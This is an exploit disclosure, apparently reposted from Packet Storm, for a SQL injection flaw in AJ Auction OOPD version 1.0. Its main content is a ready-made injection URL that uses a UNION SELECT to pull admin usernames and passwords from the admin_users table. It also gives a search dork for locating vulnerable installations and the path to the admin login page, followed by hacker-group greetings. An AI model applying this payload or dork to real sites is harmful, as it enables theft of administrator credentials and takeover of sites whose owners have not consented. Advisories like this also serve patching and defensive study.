AJ Auction OOPD version 1.0 suffers from a SQL injection vulnerability.
4049a38bebb5e7a541dd93fd4bc108431f08f1199311972019d1be6b6e389db2#########################################################
#
# AJ Auction OOPD V.1 SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# hussin.x[at]hotmail[DoT]com =
# =
#=========================================================
# HomE script : https://www.ajauctionpro.com/ajhome.php
#
# Demo : https://www.ajauctionpro.com/auction_2008/v1/
#
# DorK : Powered By AJ Auction
#
##########################################################
Exploit:
https://localhost.com/[PaTs]/[PaTs]/?do=allcat&id=-1+union+select+concat(user_name,0x3a,password)+from+admin_users--
Admin login
admin/adminindex.php
################################################################################
#####################################( Greetz )#################################
# #
# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA #
# mos_chori / Rafi / FAHD / Iraq Hackers / #
# #
#################################(and All IRAQIs)###############################
################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed